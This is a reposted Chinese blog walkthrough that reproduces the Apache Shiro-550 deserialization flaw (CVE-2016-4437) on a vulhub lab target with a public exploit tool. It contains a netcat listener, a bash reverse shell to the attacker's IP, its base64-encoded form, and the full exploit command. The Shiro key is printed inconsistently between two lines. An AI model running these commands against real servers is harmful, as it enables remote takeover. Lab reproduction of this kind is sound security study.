Shiro-550反序列化漏洞(CVE-2016-4437)复现

x33g5p2x  于2022-06-29 转载在 其他  
字(0.8k)|赞(0)|评价(0)|浏览(469)

本文章使用Shiro_exploit此工具复现,靶机环境为vulhub

项目地址:

https://github.com/insightglacier/Shiro_exploit

https://github.com/vulhub/vulhub

1. 搭建环境

靶机 ip:192.168.171.10

Kali ip:192.168.171.21

进入vulnhub的 shiro/CVE-2016-4437 目录,输入 docker-compose up -d 环境就搭建好了。然后输入 docker ps 就看到ip和端口了。

浏览器访问正常:

2. 复现漏洞

执行命令:

python .\shiro_exploit.py -u http://192.168.171.10:8080

发现vulnerable:True证明存在漏洞,后面是Shiro Key:

PH+bIxk5D2deZiIxcaaaA==

Kali监听本地端口

nc -lvvp 1234

将反弹shell的bash命令base64编码:

bash -i >& /dev/tcp/192.168.171.21/1234 0>&1

==>

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4yMS8xMjM0IDA+JjEK}|{base64,-d}|{bash,-i}

运行脚本执行命令:

python shiro_exploit.py -u http://192.168.171.10:8080 -t 3 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4yMS8xMjM0IDA+JjEK}|{base64,-d}|{bash,-i}" -k "kPH+bIxk5D2deZiIxcaaaA=="

可以看到shell反弹成功:

相关文章